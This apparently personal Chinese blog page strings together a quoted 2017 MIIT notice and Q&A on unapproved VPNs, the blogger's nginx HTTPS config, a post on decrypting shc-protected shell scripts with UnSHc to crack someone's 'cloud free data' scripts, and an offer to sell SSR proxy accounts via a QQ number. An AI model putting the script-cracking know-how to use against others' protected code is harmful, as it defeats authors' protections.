（二）全面开展自查，自觉清理整顿

各基础电信企业集团公司要组织下属企业全面自查，统一业务规程和相关要求，从合同约束、用途复查、违规问责等全流程加强规范管理，严防各类接入资源违规使用；对存在问题的要立即予以改正，并追究相关负责人责任。

各IDC、ISP、CDN企业要落实主体责任，按照本通知要求全面自查清理，及时纠正各类违规行为，确保经营资质合法合规，网络设施和线路资源使用规范，加强各项管理系统建设并通过评测。

（三）加强监督检查，严查违规行为

各通信管理局加强对企业落实情况的监督检查，发现违规问题要督促企业及时整改，对拒不整改的企业要依法严肃查处；情节严重的，应在年检工作中认定为年检不合格，将其行为依法列入企业不良信用记录，经营许可证到期时依法不予续期，并且基础电信企业在与其开展合作、提供接入服务时应当重点考虑其信用记录。部将结合信访举报、舆情反映等情况适时组织开展监督抽查。

（四）完善退出机制，做好善后工作

对未达到相关许可要求或被列入因存在违规行为被列入不良信用记录的企业，不得继续发展新用户。发证机关督促相关企业在此期间按照《电信业务经营许可管理办法》有关规定做好用户善后工作。向发证机关提交经营许可证注销申请的，发证机关应依法注销该企业的IDC、ISP经营许可证。

（五）完善信用管理，加强人员培训

积极发挥第三方机构优势，研究建立IDC/ISP/CDN企业信用评价机制，从基础设施、服务质量、网络和信息安全保障能力等多维度综合评定，引导企业重视自身信用状况、完善管理制度建设、规范市场经营行为。各通信管理局要加强对相关从业人员的技能培训，不断提高从业人员的业务素质和能力水平。

四、工作要求

（一）提高认识，加强组织领导

开展互联网网络接入服务市场规范清理工作是加强互联网行业管理和基础管理的重要内容，对夯实管理基础、促进行业健康有序发展具有重要意义。各相关单位要指定相关领导牵头负责，加强组织保障，抓好贯彻落实。

（二）分工协作，落实各方责任

各通信管理局、基础电信企业集团公司、互联网网络接入服务企业要落实责任，按照本通知要求，制定工作方案，明确任务分工、工作进度和责任，细化工作、责任到人，确保本次规范清理工作各项任务按期完成。

（三）加强沟通，定期总结通报

各通信管理局、各基础电信企业集团公司要加强沟通协作，及时总结工作经验，每季度末向部（信息通信管理局）报送工作进展情况，发生重大问题随时报部。部（信息通信管理局）将建立情况通报制度，并定期向社会公示规范清理工作进展情况。

工业和信息化部

2017年1月17日

---

工信部：回答几个有关 VPN 严管的问题

《通知》显示，外贸企业、跨国企业因办公自用等原因，需要通过专线等方式跨境联网时，可以向依法设置国际通信出入口局的电信业务经营者租用，《通知》的相关规定不会对其正常运转造成影响。

以下为工信部答媒体问全文：

问：《通知》出台的背景情况是什么？为何要出台这样一个政策？

答：近年来，我国云计算、大数据等应用蓬勃发展，以互联网数据中心业务（IDC）、互联网接入服务业务（ISP）和内容分发网络业务（CDN）为代表的互联网网络接入服务市场面临难得的发展机遇，但无证经营、无序发展的苗头也随之显现，层层转租、违规自建网络基础设施等带来的“黑带宽”、“下水道”等问题不容忽视，既破坏了正常的市场秩序，损害了广大用户的合法权益，也给国家网络和信息安全带来隐患。

在此背景下，我部出台了《关于清理规范互联网网络接入服务市场的通知》，在全国范围内开展清理规范工作，依法查处无证经营、超范围经营、“层层转租”等违法行为，切实落实企业主体责任，加强经营许可和接入资源的管理，强化网络信息安全管理，维护公平有序的市场秩序，促进行业健康发展。

问：《通知》开展的清理规范工作的重点是什么？

答：本次清理规范工作将在以下三方面开展重点工作：一是加强资质管理，重点查处无证经营和超范围经营等非法经营行为，督促企业合法持证开展经营活动；二是严格资源管理，重点打击“层层转租”等违规行为，清理网络接入服务市场存在的“黑带宽”、“下水道”；三是落实相关要求，夯实管理基础，推动接入服务企业加强技术手段建设，完成各项评测工作。

问：《通知》提出，未经电信主管部门批准，不得自行建立和租用专线（含虚拟专用网络VPN）等其他信道开展跨境经营活动。这是否会对外贸企业、跨国企业的正常运转造成影响？

答：《通知》关于跨境开展经营活动的规定，主要的依据是《国际通信出入口局管理办法》（原信息产业部令第22号），规范的对象是未经电信主管部门批准，无国际通信业务经营资质的企业或个人，租用国际专线或VPN，私自开展跨境的电信业务经营活动。外贸企业、跨国企业因办公自用等原因，需要通过专线等方式跨境联网时，可以向依法设置国际通信出入口局的电信业务经营者租用，《通知》的相关规定不会对其正常运转造成影响。

---

好了,废话完了...

下面说说我的看法哈,我为了确认一下,去百度搜索了一下,基本上没有了...国内嘛,响应速度那是杠杠的!所以呢,想用VPN的就只有那所谓的合法的企业才能开设了,就像卖盐一样,你不合法不能卖!嘿嘿,私自建立VPN者,抓起来!buguo,我们还有小飞机可以愉快的爬墙啊,哈哈.不过不能嚣张,一嚣张估计也死得快...毕竟练GFW都可以建立的国度,想要封锁小飞机也不是不能够实现的...我们自求多福别把小飞机搞死了吧!不然又得寻找另外的方法,很蛋疼的.

关于部署https,我比较推荐表哥xdtianyu的github地址:https://github.com/xdtianyu/scripts/tree/master/lets-encrypt.借助别人的py脚本一键部署,分分钟搞定https,还是免费的!加入crontab 每月自动更新,麻麻再也不用担心我的https部署了,下面附上几个部署https可能用得着的地址,算是我的笔记吧:

Mozilla火狐的ssl部署之服务器配置推荐方案:https://mozilla.github.io/server-side-tls/ssl-config-generator/

CSR文件在线生成工具:https://csr.chinassl.net/generator-csr.html

野卡证书(免费的泛域名)申请地址:https://assl.loovit.net/

下面贴出我的nginx配置证书给各位参考:

server {
    listen 80 ;
    listen [::]:80 ;
    # 将所有80端口的http通过301跳转到https://mrxn.net.
    #如果是主域名没有www,就不用第三个server的配置了.然后改一下第二个server_name 为mrxn.net就OK.
    # Redirect all HTTP requests to HTTPS with a 301 Moved Permanently response.
    return 301 https://mrxn.net$request_uri;
}
server {
    listen 443 ssl http2;
    listen [::]:443 ssl http2;
    ssl on;
    # certs sent to the client in SERVER HELLO are concatenated in ssl_certificate
    ssl_certificate /Your-crt-pwd/www.chained.crt;
    ssl_certificate_key /Your-key-pwd/mrxn.net.key;
    ssl_session_timeout 1d;
    ssl_session_cache shared:SSL:50m;
    ssl_session_tickets off;
    ssl_prefer_server_ciphers on;
    # HSTS (ngx_http_headers_module is required) (15768000 seconds = 6 months)
    add_header Strict-Transport-Security max-age=15768000;
    server_name mrxn.net;
    index index.html index.htm index.php default.html default.htm default.php;
    root  /Your-webroot-pwd/; 
    .......Your--other--config........
}
server {
    listen 443 ssl http2;
    listen [::]:443 ssl http2;
    ssl on;
    # certs sent to the client in SERVER HELLO are concatenated in ssl_certificate
    ssl_certificate /Your-crt-pwd/www.chained.crt;
    ssl_certificate_key /Your-key-pwd/mrxn.net.key;
    ssl_session_timeout 1d;
    ssl_session_cache shared:SSL:50m;
    ssl_session_tickets off;
    ssl_prefer_server_ciphers on;
    #将https://mrxn.net跳转到https://mrxn.net
    server_name mrxn.net;
    return 301 https://mrxn.net$request_uri;
}

关于配置https或者是服务器有什么问题的可以先搜索一下:https://mrxn.net/index.php?keyword=https 善用搜索!

不会的再咨询我哈,有空会为你们解答的.我们下回见!

首先简单的介绍一下shc:

shc是一个专业的加密shell脚本的工具.它的作用是把shell脚本转换为一个可执行的二进制文件，这个办法很好的解决了脚本中含有IP、密码等不希望公开的问题.

今天逛一个博客看见了他的一篇文章说的关于破解云免脚本的,评论里面很多人说破解不了骚逼汪的云免脚本,我就是试试而已.哈哈

Google一下就找到了在youtube上的一个视频: UnSHc - decrypt shc *.sh.x bash script

然后在作者的博客和github找到了:Unshc脚本.一键破解,很方便,在此记录一下:

首先未破解时是二进制打开是这样:

然后克隆Unshc脚本到本地:

然后赋予脚本的执行权限后就可以看到相应使用方法:

直接破解:

破解后的:

Unshc 作者github和博客:

https://github.com/yanncam/UnSHc

https://www.asafety.fr/unshc-the-shc-decrypter/

利用好搜索.事半功倍! 下回见!

第一:偶然发现,斗破苍穹居然做成Q版人物动画片了...

时间真快啊,看了更新的两集,感触良多,上高中时就在追土豆的作品.不过动画片(腾旭视频有)看起来画面感更强,但是始终觉得没有小说看起来那么吸引人,也或许是因为所处的环境和现在过去的心态不一样了吧.人嘛,总是会成长的.然后呢,就有有个想法了,再看一遍斗破苍穹.哈哈-_-|| 为此下载了一个多看,不为啥就因为它的WLAN传书方便啊,我就可以用电脑把从网上下载下来的小说直接导入手机了,就不用花钱去买了.-_-,是因为我穷啊..哈哈

第二:怎么今年这么冷!

依稀记得去年的冬天我是两件衣服一条薄裤=_=| ,如今套上棉服,棉裤,坐在电脑前依然感觉冷...冻腿,又没有暖气.嗯,我想是锻炼太少了.哈哈

第三:我准备在小范围内出售我的{过}番羽{滤}土啬{过}账{滤}号,

备注:我用的是SSR,跨平台支持,稳定,良好(因为自用-_-哈哈).我只卖给有需要的朋友,禁止滥用,因为你与服务器的连接都有统计的,别想滥用,正常使用,看视频,都可以的,不要下载大文件,比如一次性下载好几个G的那种镜像文件...我的小水管承受不起,正常浏览网页,看视频,youtube,twitter,facebook,Google等等这些都似乎很easy的...有需要的可以考虑一下加我企鹅,1451657099.备明来意,SSR.谢谢.

ps:服务器放哪里一个月流量也是放着.我这里只要不滥用,设备三个,流量不限制.只打算收最多10个人,人多了不能保证质量.价格等人齐了一起商量.保证不坑人.

免责申明

用户以各种方式使用本软件（包括但不限于修改使用、直接使用、通过第三方使用）的过程中，不得以任何方式利用本软件直接或间接从事违反中国法律、以及社会公德的行为。软件的使用者需对自身行为负责，因使用软件引发的一切纠纷，由使用者承担全部法律及连带责任。作者不承担任何法律及连带责任。

对免责声明的解释、修改及更新权均属于作者本人所有。